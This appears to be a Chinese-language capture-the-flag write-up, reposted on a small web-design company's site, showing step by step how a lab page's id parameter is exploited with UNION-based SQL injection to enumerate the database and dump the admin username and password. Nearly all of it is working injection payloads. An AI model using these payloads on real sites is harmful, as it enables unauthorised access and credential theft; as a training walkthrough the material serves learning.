logo

哈达波斯网|专注网站

知识文档

猫舍 writeup

知识文档  2019/9/2 8:36:19  管理员  

目标url:http://117.41.229.122:8003/?id=1

01.jpg

第一步,判断是否存在sql注入漏洞

构造 ?id=1 and 1=1 ,回车

02.jpg

页面返回正常

构造 ?id=1 and 1=2 ,回车

03.jpg

页面不正常,初步判断这里 可能 存在一个注入漏洞

第二步:判断字段数

构造 ?id=1 and 1=1 order by 1 回车

04.jpg

页面正常

构造 ?id=1 and 1=1 order by 2 回车

05.jpg

页面正常

构造 ?id=1 and 1=1 order by 3 回车

06.jpg

页面返回 错误,判断字段数为   2

第三步:判断回显点

构造 ?id=1 and 1=2 union select 1,2 回车

07.jpg

页面出现了  2  ,说明我们可以在数字  2  处显示我们想要的内容

第四步:查询相关内容

查询当前数据库名

构造 ?id=1 and 1=2 union select 1,database() 回车

08.jpg


查询当前数据库版本

构造 ?id=1 and 1=2 union select 1,version() 回车

09.jpg

查询当前数据库 表名

构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车

10.jpg

绝大数情况下,管理员的账号密码都在admin表里

查询字段名

构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1 回车

11.jpg

构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1 回车

12.jpg

构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1 回车

13.jpg

查出 admin 表里 有  id   username  password  三个字段

查询字段内容

构造 ?id=1 and 1=2 union select 1,username from admin  limit 0,1 回车

14.jpg

构造 ?id=1 and 1=2 union select 1,password from admin  limit 1,1 回车

15.jpg

limit 1,1 没有回显,说明只有一个用户

构造 ?id=1 and 1=2 union select 1,password from admin  limit 0,1 回车

16.jpg

得到管理员账号和密码
admin
hellohack


注:来自Track安全社区


网站首页  | 最新公告  | 漏洞修补  | 网站模板  | 知识文档  | 与我联系
Copyright © 2015 jlasp.com All Rights Reserved.
哈达波斯网|专注网站 版权所有
地址:吉林省吉林市昌邑区 联系QQ:383612004 联系人:董先生
未经本站授权,禁止复制或建立镜像,内容仅用于学习参考!
ICP备案号:吉ICP备15000891号-1 | 

吉公网安备 22020202000301号